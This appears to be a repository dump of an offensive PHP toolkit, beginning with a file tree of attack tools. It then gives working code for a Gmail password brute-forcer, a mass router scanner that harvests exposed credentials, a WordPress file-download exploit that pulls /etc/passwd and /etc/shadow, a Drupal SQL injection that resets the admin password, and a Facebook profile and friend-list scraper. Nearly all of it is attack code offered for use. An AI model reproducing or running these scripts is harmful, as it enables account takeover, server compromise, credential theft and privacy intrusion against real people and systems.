├── INSTALL.sh ├── INURLBR ├── GMAIL_BRUTE_FORCE.php ├── RouterHunterBR.php ├── exploit.php ├── exploitDrupal7.php ├── face.php ├── inurlbr.php ├── md5.php └── readme.txt ├── README.md ├── files ├── DLINK │ ├── img_wireless_bottom.gif │ ├── index.html │ ├── login.html │ ├── logo.gif │ ├── md5.js │ ├── substyle_DIR-615.css │ ├── ubicom.js │ └── xml_data.js ├── Login_files │ ├── banner_left.gif │ ├── index.html │ ├── login.html │ ├── spacer.gif │ ├── styles.css │ └── user__xl.gif ├── ROUTERS_DEFAULT │ ├── index.html │ └── login.html ├── eu.jpg ├── javaBanner.jpg ├── list.txt └── post-modules.txt ├── license ├── logs └── .log ├── modules ├── Intro.nt ├── Post-auto.rc ├── adobe_flash_hacking_team_uaf.rb ├── changelog.nt ├── cupp.py ├── database.db ├── exec.c ├── msf.swf ├── my-auxiliary.rb ├── priv8.sh ├── samsung_reset.py ├── unicorn.py ├── update.txt ├── web_delivery.bat └── web_delivery.py ├── netool.sh ├── priv8 ├── .set └── handler │ └── .set ├── shellter ├── faq.txt ├── icon │ └── shellter.ico ├── license.txt ├── readme.txt ├── shellcode_samples │ ├── calc │ ├── calcenc │ ├── info.txt │ ├── krb1 │ └── krb3 ├── shellter.exe └── version_history.txt ├── sslstrip-0.9 ├── COPYING ├── README ├── lock.ico ├── setup.py ├── sslstrip.py └── sslstrip │ ├── ClientRequest.py │ ├── ClientRequest.pyc │ ├── CookieCleaner.py │ ├── CookieCleaner.pyc │ ├── DnsCache.py │ ├── DnsCache.pyc │ ├── SSLServerConnection.py │ ├── SSLServerConnection.pyc │ ├── ServerConnection.py │ ├── ServerConnection.pyc │ ├── ServerConnectionFactory.py │ ├── ServerConnectionFactory.pyc │ ├── StrippingProxy.py │ ├── StrippingProxy.pyc │ ├── URLMonitor.py │ ├── URLMonitor.pyc │ ├── __init__.py │ └── __init__.pyc ├── templates ├── WinSCP.exe ├── flashplayer.exe ├── procexp.exe ├── procexp.sfx.exe ├── putty.exe └── template.pdf └── toolkit_config /INURLBR/GMAIL_BRUTE_FORCE.php: -------------------------------------------------------------------------------- 1 | Gmail Brute Force Attacker 20 | 21 | 37 | 38 | 
39 | 40 | 43 | 44 |
41 |
Gmail Brute Force Attacker
42 |
45 | 46 | 47 | 52 | 53 | 54 | 59 | 60 | 61 | 70 | 71 | 72 | 77 | 78 |
48 |
49 | 50 |
51 |
55 |
56 | 57 |
58 |
62 |
63 |
64 | Username to brute:
65 |

66 | -
67 |
68 |
69 |
73 |
74 | 75 |
76 |
79 | "; 80 | // Sets variables and retrives google error for comparing 81 | if(isset($_POST['attack']) && isset($_POST['username'])) { 82 | $username = $_POST['username']; 83 | $headers = array( 84 | "Host: mail.google.com", 85 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4", 86 | "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", 87 | "Accept-Language: en-us,en;q=0.5", 88 | "Accept-Encoding: text", # No gzip, it only clutters your code! 89 | "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7", 90 | "Date: ".date(DATE_RFC822) 91 | ); 92 | $c = curl_init('https://mail.google.com/mail/feed/atom'); 93 | curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication 94 | curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers 95 | curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! 96 | curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow 97 | curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); 98 | curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); 99 | curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised 100 | $wrong = curl_exec($c); // Get it 101 | curl_close($c); // Close the curl stream 102 | } 103 | //Dictionary Attack 104 | if($_POST['attack'] == "dictionary") { 105 | $Dictionary = file("$dic"); 106 | for ($Position = 0; $Position < count($Dictionary); $Position++) { 107 | $Dictionary[$Position] = str_replace("rn", "", $Dictionary[$Position]); 108 | if(check_correct($username, $Dictionary[$Position])) { 109 | die(" 110 | 111 | 114 | 115 |
112 |
Found the password of: ".$Dictionary[$Position]."
For the account: ".$username."
113 |
116 | 117 | "); 118 | } 119 | } 120 | echo " 121 | 122 | 126 | 127 |
123 |
Sorry... a password was not found for the account of ".$username." during the dictionar 124 | y attack.
125 |
"; 128 | } 129 | //Brute Attack 130 | elseif($_POST['attack'] == "brute") { 131 | for ($Pass = 0; $Pass < 2; $Pass++) { 132 | if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; } 133 | if(check_correct($username, $Pass)) { 134 | die(" 135 | 136 | 139 | 140 |
137 |
Found the password of: ".$Dictionary[$Position]."
For the account: ".$username."
138 |
141 | 142 | "); 143 | } 144 | } 145 | echo " 146 | 147 | 151 | 152 |
148 |
Sorry... a password was not found for the account of ".$username." during the brute for 149 | ce attack.
150 |
"; 153 | } 154 | echo " 155 | "; 156 | // Function for checking whether the username and password are correct 157 | function check_correct($username, $password) 158 | { 159 | global $wrong, $headers; 160 | $c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom'); 161 | curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication 162 | curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers 163 | curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! 164 | curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow 165 | curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); 166 | curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); 167 | curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised 168 | $str = curl_exec($c); // Get it 169 | curl_close($c); 170 | if($str != $wrong) {return true;} 171 | else {return false;} 172 | } 173 | 174 | ?> 175 | -------------------------------------------------------------------------------- /INURLBR/RouterHunterBR.php: -------------------------------------------------------------------------------- 1 | (.*?)<\/name>/i'; 128 | $set['reg2'] = '/(.*?)<\/pw>/i'; 129 | 130 | if (not_isnull_empty($html) && preg_match($set['reg1'], $html) && preg_match($set['reg2'], $html)) { 131 | 132 | preg_match_all($set['reg1'], $html, $set['user']); 133 | preg_match_all($set['reg2'], $html, $set['pass']); 134 | 135 | for ($i = 0; $i <= count($set['user']); $i++) { 136 | 137 | $set['out'].= "USER: {$set['user'][1][$i]} | PW: {$set['pass'][1][$i]}\n"; 138 | } 139 | return $set['out']; 140 | } 141 | 142 | return FALSE; 143 | } 144 | 145 | //INFORMATION IP 146 | function __infoIP($ip) { 147 | __plus(); 148 | $return = json_decode(file_get_contents("http://www.telize.com/geoip/{$ip}"), TRUE); 149 | return "{$return['city']} /{$return['country']} - {$return['country_code']} /{$return['continent_code']} , ISP: {$return['isp']}"; 150 | } 151 
| 152 | //VALIDATION VARIABLE 153 | function not_isnull_empty($value = NULL) { 154 | 155 | RETURN !is_null($value) && !empty($value) ? TRUE : FALSE; 156 | } 157 | 158 | //MENU BANNER 159 | function __banner($msg, $op = NULL) { 160 | 161 | system("command clear"); 162 | print_r(" 163 | \n{$_SESSION["c01"]} _____ 164 | {$_SESSION["c01"]} (_____) 165 | {$_SESSION["c01"]} ({$_SESSION["c13"]}() (){$_SESSION["c01"]}) 166 | {$_SESSION["c01"]} \ / 167 | {$_SESSION["c01"]} \ / 168 | {$_SESSION["c01"]} /=\ 169 | {$_SESSION["c01"]} [___] / script exploit developed by INURL - BRAZIL - [ SCANNER RouterHunterBR 1.0 ] 170 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}AUTOR: Cleiton Pinheiro / NICK: GoogleINURL 171 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}AUTOR: Jhonathan davi / NICK: Jhoon 172 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}EMAIL: inurllbr@gmail.com 173 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Blog: http://blog.inurl.com.br 174 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Twitter: https://twitter.com/googleinurl 175 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Fanpage: https://fb.com/InurlBrasil 176 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}GIT: https://github.com/googleinurl 177 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}PASTEBIN: http://pastebin.com/u/googleinurl 178 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA 179 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}PACKETSTORMSECURITY: http://packetstormsecurity.com/user/googleinurl 180 | 181 | {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Simple search: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt 182 | {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt 183 | {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set source file: php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt 184 | 
{$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set proxy: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118' 185 | {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Proxy format: 186 | --proxy 'localhost:8118' 187 | --proxy 'socks5://googleinurl@localhost:9050' 188 | --proxy 'http://admin:12334@172.16.0.90:8080' 189 | \n{$_SESSION["c01"]}{$msg}{$_SESSION["c00"]}\n"); 190 | (is_null($op)) ? exit() : NULL; 191 | } 192 | 193 | //CREATING FORMATTING IPS FOR BAND 194 | function __getRange($range) { 195 | 196 | $ip = explode('.', $range); 197 | if (is_array($ip) && count($ip) == 4) { 198 | 199 | $ip[0] = (strstr($ip[0], '-')) ? explode('-', $ip[0]) : explode('-', "{$ip[0]}-{$ip[0]}"); 200 | $ip[1] = (strstr($ip[1], '-')) ? explode('-', $ip[1]) : explode('-', "{$ip[1]}-{$ip[1]}"); 201 | $ip[2] = (strstr($ip[2], '-')) ? explode('-', $ip[2]) : explode('-', "{$ip[2]}-{$ip[2]}"); 202 | $ip[3] = (strstr($ip[3], '-')) ? explode('-', $ip[3]) : explode('-', "{$ip[3]}-{$ip[3]}"); 203 | return $ip; 204 | } else { 205 | return FALSE; 206 | } 207 | } 208 | 209 | //GENERATING IPS RANDOM 210 | function __getIPRandom() { 211 | 212 | $bloc1 = rand(0, 255); 213 | $bloc2 = rand(0, 255); 214 | $bloc3 = rand(0, 255); 215 | $bloc4 = rand(0, 255); 216 | $ip = "{$bloc1}.{$bloc2}.{$bloc3}.{$bloc4}"; 217 | return $ip; 218 | } 219 | 220 | //OPENING FILE FILE IPS 221 | function __getIPFile($file) { 222 | 223 | if (isset($file) && !empty($file)) { 224 | 225 | $resultIP = array_unique(array_filter(explode("\n", file_get_contents($file)))); 226 | __plus(); 227 | if (is_array($resultIP)) { 228 | 229 | return ($resultIP); 230 | } 231 | } 232 | return FALSE; 233 | } 234 | 235 | //AGENT REQUEST RANDOM 236 | function __getUserAgentRandom() { 237 | 238 | //AGENT BROSER 239 | $agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox', 240 | 'SeaMonkey', 
'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror' 241 | ); 242 | //AGENT OPERATING SYSTEM 243 | $agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD', 244 | 'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix', 245 | 'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android' 246 | ); 247 | //AGENT LOCAL FAKE 248 | $locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO', 249 | 'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar', 250 | 'be_BY', 'be', 'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK' 251 | ); 252 | return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ';)'; 253 | } 254 | 255 | //SEND REQUEST SERVER 256 | function __request($params) { 257 | 258 | $objcurl = curl_init(); 259 | $status = array(); 260 | curl_setopt($objcurl, CURLOPT_URL, "http://{$params['host']}{$params['exploit']}"); 261 | (!is_null($params['proxy']) ? 
curl_setopt($objcurl, CURLOPT_PROXY, $params['proxy']) : NULL); 262 | curl_setopt($objcurl, CURLOPT_USERAGENT, __getUserAgentRandom()); 263 | curl_setopt($objcurl, CURLOPT_REFERER, $params['host']); 264 | curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); 265 | curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 1); 266 | curl_setopt($objcurl, CURLOPT_HEADER, 1); 267 | curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); 268 | 269 | $info['corpo'] = curl_exec($objcurl); 270 | __plus(); 271 | 272 | $server = curl_getinfo($objcurl); 273 | 274 | __plus(); 275 | 276 | //FILTERING SERVER INFORMATION 277 | preg_match_all('(HTTP.*)', $info['corpo'], $status['http']); 278 | preg_match_all('(Server:.*)', $info['corpo'], $status['server']); 279 | preg_match_all('(X-Powered-By:.*)', $info['corpo'], $status['X-Powered-By']); 280 | 281 | $info['dados_01'] = $server; 282 | $info['dados_02'] = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['X-Powered-By'][0][0]}")); 283 | 284 | curl_close($objcurl); 285 | __plus(); 286 | return $info; 287 | } 288 | 289 | //SUB PROCESS 290 | function __subProcess($params, $target) { 291 | 292 | foreach ($params['exploit_model'] as $camp => $value) { 293 | 294 | $params['exploit'] = $value; 295 | $params['exploit_model'] = $camp; 296 | $params['host'] = $target; 297 | $rest = __request($params); 298 | 299 | __plus(); 300 | 301 | if ($rest['dados_01']['http_code'] != 0) { 302 | break; 303 | } 304 | } 305 | __plus(); 306 | $_SESSION["cont_ip"] ++; 307 | if ($rest['dados_01']['http_code'] == 200) { 308 | 309 | //FOUND FILE 310 | $style_var = "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c05"]}"; 311 | echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n"; 312 | $output_view = "{$style_var} [ ! ]__[INFO][COD]: {$rest['dados_01']['http_code']}\n"; 313 | $output_view .= "{$style_var} [ ! 
]__[INFO][IP/FILE]: {$params['host']}{$params['exploit']}\n"; 314 | $output_view .= "{$style_var} [ ! ]__[INFO][MODEL]: {$params['exploit_model']}\n"; 315 | $output_view .= "{$style_var} [ ! ]__[INFO][DETAILS_1]: {$rest['dados_02']}\n{$_SESSION["c00"]}"; 316 | $info_ip = __infoIP($rest['dados_01']['primary_ip']); 317 | $output_view .= "{$style_var} [ ! ]__[INFO][DETAILS_2]: {$info_ip}\n{$_SESSION["c00"]}"; 318 | echo $output_view . __getUserPass($rest['corpo']) . $_SESSION["c00"]; 319 | 320 | $output = "COD: {$rest['dados_01']['http_code']} / IP-FILE: {$params['host']}{$params['exploit']}\nMODEL: {$params['exploit_model']}\nDETAILS_1: {$rest['dados_02']}\nDETAILS_2:{$info_ip}\n" . __getUserPass($rest['corpo']) . "{$params['line']}"; 321 | file_put_contents($params['file_output'], "{$output}\n{$params['line']}\n", FILE_APPEND); 322 | 323 | __plus(); 324 | } else { 325 | 326 | //FILE NOT FOUND 327 | echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n"; 328 | echo "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c13"]} [X]__[NOT VULN]: {$params['host']}\n{$_SESSION["c00"]}"; 329 | } 330 | 331 | echo $_SESSION["c07"] . $params['line'] . 
$_SESSION["c00"]; 332 | } 333 | 334 | function main($params) { 335 | 336 | //IMPLEMENTATION HOME 337 | echo __banner("{$_SESSION["c13"]}{$params['line']}\n{$_SESSION["c00"]}", 1); 338 | if ($params['op'] == 0) { 339 | 340 | //WORKING WITH IPS ON TRACK 341 | for ($i = $params['range'][0][0]; $i < $params['range'][0][1]; $i++) { 342 | 343 | __plus(); 344 | __subProcess($params, "{$i}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$params['range'][3][0]}"); 345 | __plus(); 346 | } 347 | 348 | for ($i = $params['range'][1][0]; $i < $params['range'][1][1]; $i++) { 349 | 350 | __plus(); 351 | __subProcess($params, "{$params['range'][0][0]}.{$i}.{$params['range'][2][0]}.{$params['range'][3][0]}"); 352 | __plus(); 353 | } 354 | 355 | for ($i = $params['range'][2][0]; $i < $params['range'][2][1]; $i++) { 356 | 357 | __plus(); 358 | __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$i}.{$params['range'][3][0]}"); 359 | __plus(); 360 | } 361 | 362 | for ($i = $params['range'][3][0]; $i < $params['range'][3][1]; $i++) { 363 | 364 | __plus(); 365 | __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$i}"); 366 | __plus(); 367 | } 368 | } elseif ($params['op'] == 1) { 369 | 370 | //WORKING WITH IP RANDOM 371 | !not_isnull_empty($params['limit-ip']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SET NUMBER OF IPS\n{$_SESSION["c00"]}") : NULL; 372 | for ($i = 0; $i <= $params['limit-ip']; $i++) { 373 | 374 | __subProcess($params, __getIPRandom()); 375 | __plus(); 376 | } 377 | } elseif ($params['op'] == 2) { 378 | 379 | //IP WORK SOURCE FILE 380 | !is_array($params['file']) ? 
__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SOMETHING WRONG WITH YOUR FILE\n{$_SESSION["c00"]}") : NULL; 381 | __plus(); 382 | foreach ($params['file'] as $value) { 383 | __subProcess($params, $value); 384 | __plus(); 385 | } 386 | } 387 | } 388 | 389 | //RUNNING ALL PROCESS 390 | main($params); 391 | -------------------------------------------------------------------------------- /INURLBR/exploit.php: -------------------------------------------------------------------------------- 1 | $valor) { 60 | $postDados_format .= $campo . '=' . ($valor) . '&'; 61 | } 62 | 63 | $postDados_format = rtrim($postDados_format, '&'); 64 | curl_setopt($curl, CURLOPT_POST, count($postDados)); 65 | curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format); 66 | curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']); 67 | curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0(X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/'. md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/'. rand(1, 500) . '.31'); 68 | curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] . 69 | $config['exploit']); 70 | curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); 71 | curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20); 72 | curl_setopt($curl, CURLOPT_HEADER, 1); 73 | curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 74 | $corpo = curl_exec($curl); 75 | $server = curl_getinfo($curl); 76 | $status = NULL; 77 | preg_match_all('(HTTP.*)', $corpo, $status['http']); 78 | preg_match_all('(Server:.*)', $corpo, $status['server']); 79 | preg_match_all('(Content-Disposition:.*)', $corpo, $status['Content-Disposition']); 80 | $info = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]}{$status['Content-Disposition'][0][0]}")); 81 | curl_close($curl); 82 | unset($curl); 83 | return isset($corpo) ? 
array('corpo' => $corpo, 'server' => $server,'info' => $info) : FALSE; 84 | } 85 | 86 | function main($config, $rest) { 87 | 88 | __plus(); 89 | print " |[INFO][EXPLOITATION THE FILE]:{$config['file']}:\n"; 90 | preg_match_all("(root:.*)", $rest['corpo'], $final); 91 | preg_match_all("(sbin:.*)", $rest['corpo'], $final__); 92 | preg_match_all("(ftp:.*)", $rest['corpo'], $final___); 93 | preg_match_all("(nobody:.*)", $rest['corpo'], $final____); 94 | preg_match_all("(mail:.*)", $rest['corpo'], $final_____); 95 | $_final = array_merge($final[0], $final__[0], $final___[0], $final____[0], $final_____[0]); 96 | $res = NULL; 97 | if (preg_match("#root#i", $rest['corpo'])) { 98 | $res.= " |[INFO][IS VULN][RESUME][VALUES]:\n"; 99 | $res.=$config['line']; 100 | foreach ($_final as $value) { 101 | $res.=" |[VALUE]: $value\n"; 102 | } 103 | $res.=$config['line']; 104 | __plus(); 105 | file_put_contents('EXPLOIT_WPAFD_Echelon.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND); 106 | print "{$res} |[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n"; 107 | } else { 108 | 109 | print " |[INFO][NOT VULN]\n"; 110 | } 111 | } 112 | 113 | print "\r |[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL - BRASIL\n"; 114 | $config['file'] = '/etc/passwd'; 115 | $rest = __request_info($objcurl = curl_init(), $config); 116 | __plus(); 117 | print $line; 118 | print " |[INFO]: {$rest['info']}\n"; 119 | print " |[INFO][TARGET]: {$config['alvo']}\n"; 120 | main($config, $rest); 121 | __plus(); 122 | $config['file'] = '/etc/shadow'; 123 | $rest = __request_info($objcurl = curl_init(), $config); 124 | __plus(); 125 | main($config, $rest); 126 | __plus(); 127 | -------------------------------------------------------------------------------- /INURLBR/exploitDrupal7.php: -------------------------------------------------------------------------------- 1 | '; 41 | 42 | $params['url'] = isset($argv[1]) && !empty($argv[1]) ? 
$argv[1] : exit("SET TARGET URL ex: php exploitDrupal7.php http://target.com save.txt"); 43 | $params['output'] = isset($argv[2]) && !empty($argv[2]) ? $argv[2] : 'OUTPUT_INURL_DRUPAL7.txt'; 44 | $params['post'] = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"; 45 | $params['url_request'] = '?q=node&destination=node'; 46 | 47 | 48 | //EXEMPLE INJECTIONS - http://blog.sucuri.net/2014/10/drupal-sql-injection-attempts-in-the-wild.html 49 | //users passwords: 50 | $params['post1'] = "name[0%20and%20extractvalue(1,concat(0x5c,(select+md5(1016)+from+users+limit+0,1)));%23%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"; 51 | 52 | //select information_schema.tables: 53 | $params['post1'] = "name[0%20and%20extractvalue(1,concat(0x5c,(select md5(1122) from 54 | information_schema.tables limit 1)));%23%20%20]=removed&name[0]=removed&pass=removed& 55 | removed=removed&form_build_id=&form_id=user_login_block&op=Log+in"; 56 | 57 | function __request($params) { 58 | 59 | $objcurl = curl_init(); 60 | curl_setopt($objcurl, CURLOPT_URL, $params['url'] . $params['url_request']); 61 | curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); 62 | curl_setopt($objcurl, CURLOPT_HEADER, 1); 63 | curl_setopt($objcurl, CURLOPT_HTTPHEADER, array( 64 | 'Content-Type: application/x-www-form-urlencoded', 65 | 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 66 | 'Accept: application/json, text/javascript, */*; q=0.01', 67 | 'X-Requested-With: XMLHttpRequest', 68 | "Referer: {$params['url']}", 69 | 'Accept-Language: en-US,en;q=0.5', 70 | 'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;' 71 | )); 72 | curl_setopt($objcurl, CURLOPT_REFERER, $params['url'] . 
$params['url_request']); 73 | curl_setopt($objcurl, CURLOPT_POSTFIELDS, $params['post']); 74 | 75 | $corpo = curl_exec($objcurl); 76 | curl_close($objcurl); 77 | 78 | if (stristr($corpo, 'mb_strlen() expects parameter 1 to be string') && $corpo) { 79 | echo " |[INFO]: VULNERABLE! Log in with username: \"admin\" and password: \"admin\" at {$params['url']}/user/login \n"; 80 | echo " |[INFO][OUTPUT]: {$params['output']}\n"; 81 | $output = "\n"; 82 | $output.= " |[INFO][URL]: {$params['url']}/user/login\n"; 83 | $output.= " |[INFO][LOGIN]: admin / pass: admin\n"; 84 | $output.= " |[INFO][DATE]: " . date("d-m-Y H:i:s"); 85 | $output.= "\n\n"; 86 | echo $output; 87 | file_put_contents($params['output'], $output, FILE_APPEND); 88 | } else { 89 | echo " |[INFO]: NOT Vulnerable , or your Internet isn't working. \n\n"; 90 | } 91 | } 92 | 93 | //EXECUT... 94 | __request($params); 95 | -------------------------------------------------------------------------------- /INURLBR/face.php: -------------------------------------------------------------------------------- 1 | #!/usr/bin/php 2 | getName() => $array_); 51 | echo 52 | 53 | "\033[1;34m 54 | ================================================================================================================ 55 | DADOS FACEBOOK 56 | ================================================================================================================ 57 | \n"; 58 | echo "\033[1;37m0x\033[0m\033[02;31mLINK:: \033[1;37m" . (isset($_SESSION['config']['link']) ? $_SESSION['config']['link'] : NULL ) . 
"\n\n"; 59 | echo "\033[1;37m0x\033[0m\033[02;31mID:: \033[1;37m{$array['fql_query_response']['user']['uid']}\n\n"; 60 | echo "\033[1;37m0x\033[0m\033[02;31mUSERNAME:: \033[1;37m{$array['fql_query_response']['user']['username']}\n\n"; 61 | echo "\033[1;37m0x\033[0m\033[02;31mNOME:: \033[1;37m{$array['fql_query_response']['user']['name']}\n\n"; 62 | echo "\033[1;37m0x\033[0m\033[02;31mPRIMEIRO NOME:: \033[1;37m{$array['fql_query_response']['user']['first_name']}\n\n"; 63 | echo "\033[1;37m0x\033[0m\033[02;31mSOBRENOME:: \033[1;37m{$array['fql_query_response']['user']['last_name']}\n\n"; 64 | echo "\033[1;37m0x\033[0m\033[02;31mSEXO:: \033[1;37m{$array['fql_query_response']['user']['sex']}\n\n"; 65 | echo "\033[1;37m0x\033[0m\033[02;31mLOCAL:: \033[1;37m{$array['fql_query_response']['user']['locale']}\n\n"; 66 | echo "\033[1;37m0x\033[0m\033[02;31mFOTO LOGO PEQUENA:: \033[1;37m" . urldecode($array['fql_query_response']['user']['pic_small_with_logo']) . "\n\n"; 67 | echo "\033[1;37m0x\033[0m\033[02;31mFOTO LOGO GRANDE:: \033[1;37m" . urldecode($array['fql_query_response']['user']['pic_big_with_logo']) . "\n\n"; 68 | echo "\033[1;37m0x\033[0m\033[02;31mFOTO LOGO:: \033[1;37m" . urldecode($array['fql_query_response']['user']['pic_square_with_logo']) . "\n\n"; 69 | echo "\033[1;37m0x\033[0m\033[02;31mFOTO:: \033[1;37m" . urldecode($array['fql_query_response']['user']['pic_with_logo']) . 
"\n\n\033[0m"; 70 | 71 | echo "http://www.facebook.com/ajax/typeahead_friends.php?u={$_SESSION['config']['id']}&__a=1\n"; 72 | $_SESSION['config3'] = getHttpResponseCode("http://www.facebook.com/ajax/typeahead_friends.php?u={$_SESSION['config']['id']}&__a=1"); 73 | echo "================================================================================================================\n"; 74 | 75 | 76 | $cont = 0; 77 | $array2 = (explode('{"', $_SESSION['config3'])); 78 | foreach ($array2 as $valores) { 79 | $valores = str_replace('],"viewer_id":0},"bootloadable":{},"ixData":[]}', '', str_replace(',"n":"","it":null}', '', $valores)); 80 | $valores = str_replace('"u":', "\033[1;37mURL::\033[0m\033[1;34m", str_replace('t":', "\033[1;37mNOME::\033[0m\033[1;34m", str_replace('"i"', "\033[1;37mID::\033[0m\033[1;34m", str_replace('\/', '/', $valores)))); 81 | echo "\033[02;31m[\033[1;37m".$cont++."\033[02;31m]\033[0m - $valores\n"; 82 | } 83 | } else { 84 | 85 | echo menu() . " Falta definir parâmetro de busca, Exemplo=> php face.php usuario\n"; 86 | } 87 | 88 | function menu() { 89 | system("command clear"); 90 | return(" 91 | \033[1;37m _____ 92 | \033[1;37m(_____) 93 | \033[1;37m(\033[02;31m() ()\033[1;37m) 94 | \033[1;37m \ / 95 | \033[1;37m \ / 96 | \033[1;37m /=\ 97 | \033[1;37m [___] / Googleinurl - [ INURLBR API face ] 98 | \033[1;37m0xNeither war between hackers, nor peace for the system. 
